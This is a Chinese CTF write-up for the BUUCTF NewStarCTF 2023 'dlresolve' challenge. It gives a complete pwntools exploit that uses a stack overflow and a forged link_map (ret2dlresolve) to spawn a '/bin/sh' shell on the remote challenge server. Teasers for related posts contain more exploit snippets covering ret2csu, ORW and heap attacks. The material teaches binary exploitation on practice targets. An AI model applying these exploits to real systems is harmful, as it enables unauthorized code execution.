BUUCTF-NewStarCTF-2023-dlresolve 题解

Created2026-02-09|Updated2026-02-09|BUUCTF 题解

|Post Views:

题目

攻击思路

64 位下 ret2dlresolve 模板题

注意将返回地址覆盖为 plt 内容后可再接返回地址控制程序流程

注意 _dl_runtime_resolve 有点像 srop 会还原寄存器

exp

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

debug = 0

if debug:
	io = process('./pwn_patched')
else:
	io = remote('node5.buuoj.cn', 28062)

link_map_base = 0x404800
binsh_addr = link_map_base + 0x28

read_plt = 0x401060
again_addr = 0x401192
plt0_addr = 0x401026
read_got  = 0x404020
pop_rdi_ret = 0x40115E
pop_rsi_ret = 0x40116B

def fake_link_map_gen(fake_link_map_base, delta, func_got_addr, mstr):
	fake_link_map = b''
	fake_link_map += p64(delta, sign = 'signed')
	fake_link_map += p64(func_got_addr - 8)
	fake_link_map += p64(fake_link_map_base + 24)
	fake_link_map += p64(fake_link_map_base - delta)
	fake_link_map += p64(7)
	fake_link_map += mstr.encode()
	fake_link_map = fake_link_map.ljust(0x68, b'\x00')
	fake_link_map += p64(fake_link_map_base)
	fake_link_map += p64(fake_link_map_base)
	fake_link_map = fake_link_map.ljust(0xF8, b'\x00')
	fake_link_map += p64(fake_link_map_base + 8)
	return fake_link_map

def attack():
	payload = b'A' * (0x70 + 8) + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(link_map_base) + p64(read_plt) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(plt0_addr) + p64(link_map_base) + p64(0)
	io.send(payload.ljust(0x100, b'\x00'))
	payload = fake_link_map_gen(link_map_base, 0x52290 - 0x10dfc0, read_got, '/bin/sh\x00')
	io.send(payload.ljust(0x100, b'\x00'))
	io.interactive()

attack()

Author: RatherHard

Link: https://www.ratherhard.com/post/BUUCTF/NewStarCTF-2023-dlresolve.html

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

pwn ret2dlresolve BUUCTF

Related Articles

BUUCTF-NewStarCTF-ret2csu1 题解

题目题目链接 checksec IDA csu 中有 call [r12 + rbx*8] ，令 r12 为指向 backdoor 地址的一个地址即 gift3 ， rbp 为 0 即可调用 backdoor 根据 execve 的参数定义，令 rdi -> “/bin/cat\x00” 即 rdi = aBinCat , rsi = gift2 , rdx = 0 再调用 backdoor 即可 exp 1234567891011121314151617181920from pwn import *context.log_level = 'debug'context.arch = 'amd64'io = process('./ret2csu1')csu1 = p64(0x40072A)csu2 = p64(0x400710)rdi = p64(0x4007BB)rsi = p64(0x601050)backdoor = p64(0x601068)padding = 32 + 8payload = b&...

BUUCTF-NewStarCTF-2023-orwrop 题解

题目题目链接 checksec 有 canary 保护 IDA 有沙箱，考虑 orw 可利用格式化字符串漏洞泄露 canary 然后发现 mmap 开了一个 rwx 区域考虑栈迁移和 ret2shellcode 我们可以在第一次溢出时迁移 rbp 并再次调用溢出漏洞，然后由于 buf 的写入是以 rbp 为基准的，所以在第二次溢出时栈已迁移，可以直接在 rwx 段上布局 shellcode 实现 orw exp 123456789101112131415161718192021222324252627282930313233343536from pwn import *context.log_level = 'debug'context.arch = 'amd64'elf = ELF('ezorw')io = process('./ezorw') fmt = b'%11$p'io.recvuntil(b'sandbox\n')io.sendline(fm...

BUUCTF-NewStarCTF-2023-ezheap 题解

题目题目链接 checksec 全开 IDA main 菜单题 menu add 一次 add 申请两个 chunk ，记为 head_chunk 和 content_chunk delete 有明显的 UAF 漏洞 show delete 后仍可以 show edit delete 后仍可以 edit read_idx read_size 攻击思路由于一次 add 申请两个 chunk ，而一次 delete 只 free 掉 head_chunk 且不清空数据，而 delete 后仍可以 edit，所以我们可以通过两次 delete 和一次 add 获得一个 head_chunk 的控制权，进而利用 edit/show 实现 AAW/AAR 同时，在上面的操作之前 delete 掉一个 head_chunk 使之进入 tcache ，我们可以利用 chunk 的残留值泄露堆地址，实现对堆的完全控制然而由于我们并没有操作栈的机会，也没有办法劫持 got 表，因此我们考虑去劫持 __free_hook 函数，这需要泄露 libc 基址由于 tcache ...

BUUCTF-NewStarCTF-ret2csu2 题解

题目题目链接 checksec 没有 canary 和 pie 但开了 Full RELRO ，要注意 .got 的只读属性 IDA 存在栈溢出，溢出长度较小，考虑栈迁移攻击思路栈迁移即可， leak 出 libc 基址后，利用 csu 构造 rop 链时考虑使用栈拼接的技巧 exp 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071from pwn import *from onegadget_selector import *context.log_level = 'debug'context.arch = 'amd64'context.terminal = ['tmux', 'splitw', '-h']libcoffsetdict = {...

BUUCTF-ZJCTF-2019-Login 题解

题目题目链接 checksec 存在 canary 保护 IDA main 一个简单的登录系统观察到 [rbp-0x130] ，它来自于 password_checker 的 rax Admin_password_checker snprintf 这里有一个坑， src 和 dest 相同会产生 buffer overlap 的问题，产生非预期结果，而使用 ‘\x00’ 可以截断这种行为其实经过动调可知，我们应该劫持 a1 为后门函数地址 Admin_password_checker_asm 上面的 a1 即此处的 rax ，为 rdi 解两层引用，接下来回到 main 去溯源 rdi main_asm rdi 溯源至 rbp - 0x130 ，注意并不是 [rbp - 0x130] ， [rbp - 0x130] 溯源至 password_checker 后的 rax password_checker_asm rax 溯源至 rbp - 0x18 ，注意并不是 [rbp - 0x18] ，由此 call rax 中的 rax 最终溯源 [rbp - 0x18...

glibc-2.31 ret2dlresolve 分析

重要结构 link_map 12345678910111213141516171819202122232425262728293031323334353637383940414243struct link_map { /* These first few members are part of the protocol with the debugger. This is the same format used in SVR4. */ ElfW(Addr) l_addr; /* Difference between the address in the ELF file and the addresses in memory. */ char *l_name; /* Absolute file name object was found in. */ ElfW(Dyn) *l_ld; /* Dynamic section of the shared object. */ struct link_ma...